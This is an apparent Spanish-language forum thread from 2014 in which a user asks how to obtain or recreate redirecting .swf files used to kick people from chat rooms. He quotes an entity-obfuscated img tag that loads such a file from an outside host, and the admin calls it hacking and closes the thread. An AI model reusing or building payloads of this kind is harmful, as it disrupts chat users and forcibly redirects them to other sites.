Ayuda por favor alguien que me diga que esté link E

Allan Cano Seguir

Iota
Verificación en dos pasos activada
Desde
26 Feb 2014
Esté es el link entre y dice que mi cuenta fue creada, pero en unas horas desaparece el contenido de ese sitio y me redirige al sitio proveedor de hosting, quisiera crear un sitio como ese con los mismos archivos pero no sé cómo, ¿alguien sabe cómo?

Ya me desespero el hecho de no poder, los archivos que están en ese sitio son semejantes a los de un administrador de un chat y me servirán para algunas cosas que pienso podrían funcionar para mis sitios.

Agradecería bastante su ayuda.

Saludos y buenas noches, desde México.

Disculpen por el titulo, lo escribí rápido y cometí errores de ortografía. ¿Puedo editar el titulo?

Última edición:

kanikase

Préstamo
Ómicron
Programador
Verificado por Whatsapp
¡Ha verificado su Paypal!
Desde
22 Feb 2014
No entiendo que es lo que quieres hacer ._.

Cicklow

Admin
Dseda
Verificado
Verificado por Whatsapp
Suscripción a IA
Desde
30 May 2011
Esté es el link h t t p: // sensord. esy. es / entre y dice que mi cuenta fue creada, pero en unas horas desaparece el contenido de ese sitio y me redirige al sitio proveedor de hosting, quisiera crear un sitio como ese h t t p: // sensord.esy.es / con los mismos archivos pero no sé cómo, ¿alguien sabe cómo?

Ya me desespero el hecho de no poder, los archivos que están en ese sitio son semejantes a los de un administrador de un chat y me servirán para algunas cosas que pienso podrían funcionar para mis sitios.

Agradecería bastante su ayuda.

Saludos y buenas noches, desde México.

solo tienes que subir tus archivos, eliminando esos que ya hay en el host... de igual manera no se entiende mucho lo que queres...

Allan Cano

Iota
Desde
26 Feb 2014
solo tienes que subir tus archivos, eliminando esos que ya hay en el host... de igual manera no se entiende mucho lo que queres...

Lo que más me interesa son los archivos, ¿crees que se puedan descargar? pues cuando les doy clic me envían a una pagina en blanco.

---------- Post agregado el 08-may-2014 hora: 06:32 ----------

No entiendo que es lo que quieres hacer ._.

Quiero los archivos, no me supe explicar bien, pero ya estuve investigando más y lo que más me interesa son los archivos, tu sabes cómo los podría descargar?

Cicklow

Admin
Dseda
Verificado
Verificado por Whatsapp
Suscripción a IA
Desde
30 May 2011
Lo que más me interesa son los archivos, ¿crees que se puedan descargar? pues cuando les doy clic me envían a una pagina en blanco.

---------- Post agregado el 08-may-2014 hora: 06:32 ----------

Quiero los archivos, no me supe explicar bien, pero ya estuve investigando más y lo que más me interesa son los archivos, tu sabes cómo los podría descargar?

si te fijas dicen 0bytes... estan vacios...no sirven

kanikase

Préstamo
Ómicron
Programador
Verificado por Whatsapp
Desde
22 Feb 2014
Para descargarlo, abres el archivo que quieras, y antes de que redireccione detienes la pagina, y haces clic en CTRL + S y asi se guardaran, con la extension .swf, pero como ya te dijo cicklow no sirven para nada :p7: solo tienen una redireccion :ambivalence:

Allan Cano

Iota
Desde
26 Feb 2014
si te fijas dicen 0bytes... estan vacios...no sirven

Perdón es que no entiendo mucho sobre el tema, los archivos son link's, esos link's se meten en un código y cuando usas ese código con el link, se lo mandas a un usuario de un chat y lo sacas del chat y lo rediriges a otro sitio.

Esté es el código con el pateas usuarios de un chat y los envías al otro sitio.

Yo le copie el código a otro usuario, el problema es que pasadas algunas horas los link's dejan de estar activos y cuando intento acceder a ellos soy redireccionado a un sitio de hosting.

Quisiera saber la forma en que ese usuario hace eso para así hacerlo yo también.

Última edición:

Cicklow

Admin
Dseda
Verificado
Verificado por Whatsapp
Suscripción a IA
Desde
30 May 2011
Perdón es que no entiendo mucho sobre el tema, los archivos son link's, esos link's se meten en un código y cuando usas ese código con el link, se lo mandas a un usuario de un chat y lo sacas del chat y lo rediriges a otro sitio.

Esté es el código : D < &# 105; mg src=" & #104; t tp :// sensord. esy. es /kickk. swf "> con el pateas usuarios de un chat y los envías al otro sitio.

Yo le copie el código a otro usuario, el problema es que pasadas algunas horas los link's dejan de estar activos y cuando intento acceder a ellos soy redireccionado a un sitio de hosting.

Quisiera saber la forma en que ese usuario hace eso para así hacerlo yo también.

es redireccionado por exeso de CPU... y de seguro son usados para hack... por eso el formato del mensaje...

Allan Cano

Iota
Desde
26 Feb 2014
es redireccionado por exeso de CPU... y de seguro son usados para hack... por eso el formato del mensaje...

¿Abra alguna forma de hacerlos yo mismo? o algún método para yo tener esos archivos que en realidad son enlaces, pues el problema es que pasadas unas horas los enlaces no funcionan y los códigos tampoco.

---------- Post agregado el 08-may-2014 hora: 07:00 ----------

Para descargarlo, abres el archivo que quieras, y antes de que redireccione detienes la pagina, y haces clic en CTRL + S y asi se guardaran, con la extension .swf, pero como ya te dijo cicklow no sirven para nada :p7: solo tienen una redireccion :ambivalence:

Es que los archivos que en realidad son link's, los metes en un código y con el código pateas o sacas usuarios de una sala de chat.

Cicklow

Admin
Dseda
Verificado
Verificado por Whatsapp
Suscripción a IA
Desde
30 May 2011
¿Abra alguna forma de hacerlos yo mismo? o algún método para yo tener esos archivos que en realidad son enlaces, pues el problema es que pasadas unas horas los enlaces no funcionan y los códigos tampoco.

Eso es hack, y ForoBeta no es para eso... aca queda este tema!